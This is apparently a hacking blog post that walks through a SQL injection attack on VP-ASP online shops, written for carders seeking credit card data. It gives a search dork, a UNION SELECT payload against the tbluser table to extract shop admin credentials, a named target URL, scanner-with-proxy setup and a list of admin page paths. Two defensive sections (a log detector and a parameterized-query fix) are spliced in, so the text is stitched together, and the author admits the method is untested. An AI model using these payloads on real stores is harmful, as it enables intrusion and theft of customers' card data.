VP-ASP Shopadmin Hack
This is a pretty common hack and is very easy. In my first post for this blog, you’ll learn how to hack the ever-so-vulnerable VP-ASP shop and gain access to a list of credit card numbers, addresses and other details customers have entered.
As covered on the main site, all information presented within this guide is for
information purposes only. any attempt to use the information within this guide
to commit anything illegal is solely the responsibility of the reader, and
neither i, information leak, nor anyone else affiliated is responsible for
what you do with the following information.
Section 1: the introduction
----------------------------
Originally i was working on a security scanner for ecommerce sites, but since i'm
about to get back into school and won't have as much time as before to really
work on many projects i decided it'd be better to just go ahead and write a
tutorial on the subject. so for this tutorial we will talk about one way a carder
would collect ccs to cash/use/sell/whatever, and that of course is exploiting
ecommerce sites. there are millions of sites out there used by businesses large
and small for peddling their services/merchandise, and needless to say there are
plenty of them out there that are easily exploited. so here it is, the answer to
every 'how to hack cc' question out there. enjoy..
Section 2: database vulnerabilities
------------------------------------
One of the most common and easiest ways to exploit ecommerce sites is to use
database vulnerabilities. these are present due to insecure database software
that many ecommerce sites will use for recording and tracking online purchases.
one method that an attacker could use to find such database vulnerabilities on
a specific site is to use an exploiter. exploiters are software that will use
an exploit list to scan for exploits on a target web server, and report back
any positive responses. cmxploiter iv
is an example of an exploiter, though there are others that you can look for to
use as well. the interface for cmxploiter iv is pretty self-explanatory, but i'll
run you through the basics anyway. to use this tool you would first click 'load',
which will bring up three different tabs. you would click 'exploit lists' to
select an exploit list to use, 'proxy list' is to of course select a list of
proxies to use, and 'url list' is to select a list of targets to scan. then from
there you would go to options. the first menu to pop up is the current session
options. edit the responses to include in session history so that only the
'200 series responses' (positive responses) are included in the results, and from
here you can also edit the 'socket timeout value' based on your internet connection
(leave as is for faster internet connections, set to 40 for slower internet
connections). then go to proxy list selection options and either put in the proxy
you are going to use for the scan, or click 'multi-proxy mode' to tell cmxploiter iv
to use the proxy list you loaded. now that you have everything configured go
to start and select the type of scan you want to do. 'single url scan' is used to
scan a single server with the exploit list provided, 'multi-url scan' is used to
scan every site in the url list for every exploit in the exploit list, and
'single exploit scan' is used to scan every site in the url list for a single
exploit. on a last note, with any exploiter you use, if the option is available
be sure to set it to use get requests instead of head requests for the scan.
i've found that you get much more accurate results that way. now that i've
covered all the configurations i'm going to provide an exploit list that you
could use for scanning database vulnerabilities..
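Seen from the server side, the scanning described above is one client requesting many store data files in a short time, and any 2xx answer means a file is actually being served. The following detector is an added example, not part of the original guide; the log lines are constructed, and the regular expressions and function name are assumptions to adapt to your own log format.

```python
import re
from collections import defaultdict

# Constructed sample access-log lines; client addresses are documentation ranges.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Jan/2024:10:00:01 +0000] "GET /store/comersus.mdb HTTP/1.1" 404 210
203.0.113.7 - - [10/Jan/2024:10:00:01 +0000] "GET /database/comersus.mdb HTTP/1.1" 404 210
203.0.113.7 - - [10/Jan/2024:10:00:02 +0000] "GET /orders/orders.txt HTTP/1.1" 200 48211
203.0.113.7 - - [10/Jan/2024:10:00:02 +0000] "HEAD /shop/shop.sql HTTP/1.1" 404 0
198.51.100.4 - - [10/Jan/2024:10:05:00 +0000] "GET /store/index.asp HTTP/1.1" 200 5120
198.51.100.4 - - [10/Jan/2024:10:05:09 +0000] "GET /images/logo.png HTTP/1.1" 200 900
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(GET|HEAD|POST) (\S+) [^"]*" (\d{3}) ')
# Data files a storefront should never serve: database files, SQL dumps, order/card logs.
SENSITIVE_RE = re.compile(
    r'\.(mdb|sql|dat|db|pw)$|/(orders?|cc|cvv2)[^/]*\.(txt|log|inc)$', re.I)

def analyse(log_text, min_probes=3):
    """Return (scanners, exposed): clients that requested at least min_probes
    distinct sensitive paths, and sensitive paths that were served (2xx)."""
    probes = defaultdict(set)
    exposed = set()
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a request line in the expected format
        client, _method, url, status = m.groups()
        path = url.split("?", 1)[0]
        if SENSITIVE_RE.search(path):
            probes[client].add(path)
            if status.startswith("2"):
                exposed.add(path)
    scanners = {c: sorted(p) for c, p in probes.items() if len(p) >= min_probes}
    return scanners, sorted(exposed)

if __name__ == "__main__":
    scanners, exposed = analyse(SAMPLE_LOG)
    for client, paths in scanners.items():
        print(f"scanner {client}: {len(paths)} sensitive paths requested")
    for path in exposed:
        print(f"EXPOSED (2xx): {path} -> move it out of the web root")
```

Any path in the second result is the urgent finding: the file belongs outside the document root, and the data in it should be treated as disclosed.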
inurl:/shopdisplayproducts.asp
1) first we find a site that uses shopdisplayproducts.asp
let's look at one such site
http://www.globalasp.org.uk/store/sh…ucts.asp?id=14
2) ok … now we put this sign at the end of the link: ‘
3) now the link will look like this
http://www.globalasp.org.uk/store/shopdisp….asp?id=14′
and we get an error.
the error looks like this:
products
microsoft jet database engine error ‘80040e14′
syntax error in string in query expression ‘cc.intcatalogid=p.catalogid and cc.intcategoryid=c.categoryid and cc.intcategoryid = 14′ and hide=0 order by specialoffer desc,cname’.
/store/shop$db.asp, line 467
if we see this error then the site is hackable !!!
4) ok … now we remove the ‘
http://www.globalasp.org.uk/store/sh…ucts.asp?id=14
and add this to the end of the link:
%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50%20from%20tbluser’
the link now is
http://www.globalasp.org.uk/store/shopdisp…%20tbluser’
and when we put it in the browser we get the same error !!!
5) ok … now look at these numbers:
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50
now we remove ,50
and test again
http://www.globalasp.org.uk/store/shopdisp…%20tbluser’
we get the same error, so we keep removing numbers one at a time; when we no longer see the error we see the site's page instead. on this server the correct number for the
exploit is -> 47 <-
http://www.globalasp.org.uk/store/shopdisp…%20tbluser’
—> here 47 is the end number
ok, now we put this in the browser and instead of the error we see some laptops.
ok … now we look on that page for the numbers 3 and 4;
they are small.
when we find those numbers, we replace 3 and 4 in the link with this:
fldusername,fldpassword
now the exploitable link is this
http://www.globalasp.org.uk/store/shopdisp…%20tbluser’
there is the login for shopadmin, and we log in !!!
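The error message in step 3 shows the id value landing inside the SQL text itself, which is the defect every later step depends on. As an added example (not from the original post; Python with SQLite stands in for the ASP/Jet stack), here is the concatenating pattern next to a handler that validates the id and binds it as a parameter. The products columns and function names are assumptions; tbluser and its fields are the names the post uses.

```python
import sqlite3

def make_db():
    """In-memory stand-in for the shop database (constructed rows)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE products (catalogid INTEGER, categoryid INTEGER, cname TEXT, hide INTEGER);
        CREATE TABLE tbluser (fldusername TEXT, fldpassword TEXT);
        INSERT INTO products VALUES (1, 14, 'laptop a', 0), (2, 14, 'laptop b', 0), (3, 9, 'mouse', 0);
        INSERT INTO tbluser VALUES ('admin', 'constructed-secret');
    """)
    return db

def products_concatenated(db, raw_id):
    # The pattern behind the error on the page: the id is pasted into the SQL text,
    # so a stray quote changes the statement and the engine's error reaches the client.
    sql = "SELECT cname FROM products WHERE categoryid = " + raw_id + " AND hide=0 ORDER BY cname"
    return [r[0] for r in db.execute(sql)]

def products_hardened(db, raw_id):
    # 1) Accept only a short run of ASCII digits; anything else is rejected before SQL.
    if not (raw_id.isascii() and raw_id.isdigit() and len(raw_id) <= 9):
        raise ValueError("invalid id")  # map to a generic 400 page, no engine details
    # 2) Bind the value as a parameter so it can never become SQL syntax.
    sql = "SELECT cname FROM products WHERE categoryid = ? AND hide=0 ORDER BY cname"
    return [r[0] for r in db.execute(sql, (int(raw_id),))]

def is_rejected(db, raw_id):
    """True when the hardened handler refuses the input outright."""
    try:
        products_hardened(db, raw_id)
    except ValueError:
        return True
    return False

if __name__ == "__main__":
    db = make_db()
    print(products_hardened(db, "14"))
    for bad in ("14'", "14 union select 1 from tbluser", "-1", ""):
        print(repr(bad), "rejected:", is_rejected(db, bad))
```

Returning a generic error page instead of the database engine's message matters as much as the binding: the procedure above relies on reading that message to tell when a request changed the query.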
these are paths where the shopadmin page can be, too
shopadmin.asp —-> this or … with 1
shopadmin1.asp —-> this is in 90 %
adminindex.html
shopadmin1.asp
shopa_displayorders.asp?page=2
shopa_displayorders.asp
shopa.asp
displayorders.asp
admin.asp
orders.asp
vieworders.asp
view_orders.asp
WARNING
i have not tested it; it has been taken from some other site, so i'm not sure whether it will work or not